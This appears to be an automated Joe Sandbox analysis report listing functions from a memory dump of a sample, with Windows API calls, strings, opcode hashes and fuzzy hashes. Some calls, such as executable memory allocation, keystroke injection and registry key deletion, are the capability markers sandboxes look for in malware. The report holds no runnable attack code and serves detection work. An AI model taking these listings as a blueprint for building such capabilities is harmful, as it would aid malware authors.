Opcode ID: b0aa332603c99338e29b352b54c86c187dd5fa31d9c545c13d852f7f4d73ed11
Instruction ID: 73108f2fb340e063aa4e1fe72ec6bc778e51966560beaeeb2fe84362a756f6a4
Opcode Fuzzy Hash: b0aa332603c99338e29b352b54c86c187dd5fa31d9c545c13d852f7f4d73ed11
Instruction Fuzzy Hash: 8AD0C270900B13CFD7206F71C90C28AB6D5EF08766B00CC3A9481C2290E6B0D480EB11

Function 00F80DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00F81039), ref: 00F80DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F80E07

Strings

advapi32.dll, xrefs: 00F80DF0
RegDeleteKeyExW, xrefs: 00F80E01

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: c9d52151af70d153d3eb405cf10d258a39b6fb4948596fe1e46ea79609810dab
Instruction ID: 5a0978e2531be394158e09e29b95faca401860b617d9047ba41500c4d206e55d
Opcode Fuzzy Hash: c9d52151af70d153d3eb405cf10d258a39b6fb4948596fe1e46ea79609810dab
Instruction Fuzzy Hash: 4ED0C730940B26CFC320AF72C80C2C372E4AF04362F448C3E9582C2150EAB0D894EB00

Function 00F790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F78CF4,?,00F8F910), ref: 00F790EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F79100

Strings

GetModuleHandleExW, xrefs: 00F790FA
kernel32.dll, xrefs: 00F790E9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: bceb62b430e8e0dbbaf94f64eb59b4a1010aeead4137837b46dc25f3cf7521bb
Instruction ID: 2a694cec92ee336f2c1ae480ebcc20180a64929e3c7201356fb00c06e4e777ef
Opcode Fuzzy Hash: bceb62b430e8e0dbbaf94f64eb59b4a1010aeead4137837b46dc25f3cf7521bb
Instruction Fuzzy Hash: 63D0C230A10713CFC7209F35C80C29272D4AF00361B01C83A9486C2150E6B0C480EB91

Function 00F41714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F41718
__swprintf.LIBCMT ref: 00F41749

Strings

%.3d, xrefs: 00F41723
WIN_XPe, xrefs: 00F41788

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 633a85baac5d7b28bf43b631b4030ca9771ecd65c6d392c92974673c2029192d
Instruction ID: 78e1ab2c400f9a63b6b06286195a8d105f8396048639333710841eb90f017abf
Opcode Fuzzy Hash: 633a85baac5d7b28bf43b631b4030ca9771ecd65c6d392c92974673c2029192d
Instruction Fuzzy Hash: 88D01273844118FAC7109B909C88EF97B7CB708301F100552FD16A2040E22597D8FA21

Function 00F5717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
Instruction ID: 158a95af05a1b5e97087ae8d866e08d06dccf4bf99d2b924086e2cbc18f86f9c
Opcode Fuzzy Hash: d778a8f116615779210af719cd4492216e102ea07d7cbd073de39722ebd9dce1
Instruction Fuzzy Hash: 61C18B75A04216EFCB14DFA8D884EAEBBB5FF48311B108598ED05EB251D730ED85EB90

Function 00F7E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00F7E0BE
CharLowerBuffW.USER32(?,?), ref: 00F7E101

Part of subcall function 00F7D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F7D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F7E301
_memmove.LIBCMT ref: 00F7E314

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: a672abc78e76ccd60c86d13363187b83c4a2443d1def42ed4639fb925cce7f46
Instruction ID: 424cb517b9c813089c458b4073bdeafc990bfbc9accc596532ba573ac29f3030
Opcode Fuzzy Hash: a672abc78e76ccd60c86d13363187b83c4a2443d1def42ed4639fb925cce7f46
Instruction Fuzzy Hash: A9C15C71A083019FC704DF28C840A6ABBE4FF89714F1489AEF8999B352D771E945DB82

Function 00F78093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F780C3
CoUninitialize.OLE32 ref: 00F780CE

Part of subcall function 00F5D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5D5D4

VariantInit.OLEAUT32(?), ref: 00F780D9
VariantClear.OLEAUT32(?), ref: 00F783AA

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: d58b0b80c9b27bb490e2ab7b5ec30bcc57765abc82f0dda9044b92f56f39a6ca
Instruction ID: 8d0fa43f17e817e3d4e39de2fd1f07e3897eaa63a9ac2d7d2102861a51ae29b1
Opcode Fuzzy Hash: d58b0b80c9b27bb490e2ab7b5ec30bcc57765abc82f0dda9044b92f56f39a6ca
Instruction Fuzzy Hash: 46A19D756087019FCB00DF14C885B2AB7E4BF89364F44844DF99A9B3A2DB74ED05EB42

Function 00F57530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F92C7C,?), ref: 00F576EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F92C7C,?), ref: 00F57702
CLSIDFromProgID.OLE32(?,?,00000000,00F8FB80,000000FF,?,00000000,00000800,00000000,?,00F92C7C,?), ref: 00F57727
_memcmp.LIBCMT ref: 00F57748

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 91792bcd4a3ff7feb79764114eb10141ecd9180fd433be2089b12f657e2d9692
Instruction ID: 4974d6f011896498fe8a68ccbc9f4c9b26b93f7a1a59a2d5483e1af8f46239a4
Opcode Fuzzy Hash: 91792bcd4a3ff7feb79764114eb10141ecd9180fd433be2089b12f657e2d9692
Instruction Fuzzy Hash: 86810E75A00209EFCB04DFA4D984EEEB7B9FF89315F204558F505AB250DB71AE0ADB60

Function 00F5687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F5688E
SysAllocString.OLEAUT32(00000000), ref: 00F56937
VariantCopy.OLEAUT32 ref: 00F56966
VariantClear.OLEAUT32(?), ref: 00F5698D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 327eb39bcc080dc5eaa7ba92ebdb1b685804f5f6afb75c75339e34f643c4ecea
Instruction ID: 9096920a71ff7fb27168d2599540dae292ce884f08ce821b8d89a472be121bdd
Opcode Fuzzy Hash: 327eb39bcc080dc5eaa7ba92ebdb1b685804f5f6afb75c75339e34f643c4ecea
Instruction Fuzzy Hash: 8A51D4757043019EDF20AF65D89173AB3E5AF45311FA0C81FEAA6DB292DE78D848B700

Function 00F897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(018BE508,?), ref: 00F89863
ScreenToClient.USER32(00000002,00000002), ref: 00F89896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F89903

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 623b8a12ed278fb3f183f30514f78f69a4198308807748e725902dbff2728adb
Instruction ID: 0cb33e86d192ce647264548501babf60aff7a4c5968797df4106f802dc4b22a7
Opcode Fuzzy Hash: 623b8a12ed278fb3f183f30514f78f69a4198308807748e725902dbff2728adb
Instruction Fuzzy Hash: 15512C34A04209AFCF10DF64C985AFE7BB5FF45360F588259F8659B2A0D770AD81EB90

Function 00F59A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F59AD2
__itow.LIBCMT ref: 00F59B03

Part of subcall function 00F59D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F59DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F59B6C
__itow.LIBCMT ref: 00F59BC3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 415436076f739c1a7aa7372e6b22ce8e375c25f1e620bf220007970ee9d880d8
Instruction ID: a2c3b8f13cefc51cae3e25f7565b1f0d7b5e7d34e070874e924344dae5b379ba
Opcode Fuzzy Hash: 415436076f739c1a7aa7372e6b22ce8e375c25f1e620bf220007970ee9d880d8
Instruction Fuzzy Hash: 00417270A04308ABEF15EF54DC45BEE7BB9EF84725F000059FE0567291DBB4AA48EB61

Function 00F769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00F769D1
WSAGetLastError.WSOCK32(00000000), ref: 00F769E1

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F76A45
WSAGetLastError.WSOCK32(00000000), ref: 00F76A51

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 6e6d68ec3af7e17506699c306de32af98d045ea4c361827efeb8131365edbf26
Instruction ID: 1af432f6b4932ea597d3a8dd7b90b57c3c9818293d6a1b3270bdf7e4973ac6cb
Opcode Fuzzy Hash: 6e6d68ec3af7e17506699c306de32af98d045ea4c361827efeb8131365edbf26
Instruction Fuzzy Hash: 21419F75740600AFEB60AF24CC86F7A77E49B04B14F44C158FA59AB3C3EAB89D01A791

Function 00F7641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F8F910), ref: 00F764A7
_strlen.LIBCMT ref: 00F764D9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4198b91461e0d989845696317270c517b19a58ceaa9bef9204ca03a924b33342
Instruction ID: c98dda1b120a5e89b7d96cb59281037fd24367dfa1273f2be1fd2138a8d011ad
Opcode Fuzzy Hash: 4198b91461e0d989845696317270c517b19a58ceaa9bef9204ca03a924b33342
Instruction Fuzzy Hash: D541B475A00504AFCB14EB64EC85FAEB7A9AF44310F14815AF919D72D2EB38AD04FB51

Function 00F6B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F6B89E
GetLastError.KERNEL32(?,00000000), ref: 00F6B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F6B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F6B915

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 38c2ab55b2afc794d21fa6b212beda3712c4d9e4b0a78f1942b5e3cd82a42252
Instruction ID: 587320c034fe3691e7fa6306724dbdeec5df40691f70405499a4868d47e82896
Opcode Fuzzy Hash: 38c2ab55b2afc794d21fa6b212beda3712c4d9e4b0a78f1942b5e3cd82a42252
Instruction Fuzzy Hash: AB412B75A00514DFCB11EF15C984A59BBE1EF4A320F49C098EC4AAB3A2DB74FD41EB91

Function 00F88851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F888DE

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 372f58ca05ecc6c56cfe9e5869d996600ecb4f6c9669d944a9b17314e36661b2
Instruction ID: e0d2df272ac09a6e8181cc7d81bb495f1b14d97b1eb5fc1c6d88260b90228f54
Opcode Fuzzy Hash: 372f58ca05ecc6c56cfe9e5869d996600ecb4f6c9669d944a9b17314e36661b2
Instruction Fuzzy Hash: 6931A134A40109AEEF20BA58CC45FF977A5EB097A0FD44112FA15E61E1CB70E982B752

Function 00F8AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00F8AB60
GetWindowRect.USER32(?,?), ref: 00F8ABD6
PtInRect.USER32(?,?,00F8C014), ref: 00F8ABE6
MessageBeep.USER32(00000000), ref: 00F8AC57

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 99a340a79959ea9d1a4146ff60f378721a0edf54c248e999146aa6cb19652b1c
Instruction ID: c46965c3b039c8252f06be1a17d279061c4d66701691e15c231b35bad1225654
Opcode Fuzzy Hash: 99a340a79959ea9d1a4146ff60f378721a0edf54c248e999146aa6cb19652b1c
Instruction Fuzzy Hash: 61416E30A00519DFEB11EF58D884BE97BF5FF4A710F1881AAE8159B365D730E841EB92

Function 00F60AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F60B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00F60B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F60BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F60BFB

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 52e8a361f490e453ec09ad63ba4e7124cdc16267dc69d6d17dcd175b7aa9b88c
Instruction ID: 06f4eaecc0b2e8d4adcfa79e69fd45352a351def295279338a312ba377c34164
Opcode Fuzzy Hash: 52e8a361f490e453ec09ad63ba4e7124cdc16267dc69d6d17dcd175b7aa9b88c
Instruction Fuzzy Hash: 39310930D402186EFB308A298C05BFBBBA5AB85329F28835AE591D11D1CB758945B755

Function 00F60C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00F60C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00F60C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00F60CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00F60D33

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 102285c85bb694be71297856441ac26d84e67538491dc8aeed9ed5c9eea1c08c
Instruction ID: f1e01f0504eb2bca5325f2c8a72306656a9a100057f89db98d06712b5fd68d7a
Opcode Fuzzy Hash: 102285c85bb694be71297856441ac26d84e67538491dc8aeed9ed5c9eea1c08c
Instruction Fuzzy Hash: 1B313530E402186EFF348B648C08BFFBBA6EB45330F28432AE481621D1CB399949F751

Function 00F361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F361FB
__isleadbyte_l.LIBCMT ref: 00F36229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F36257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F3628D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
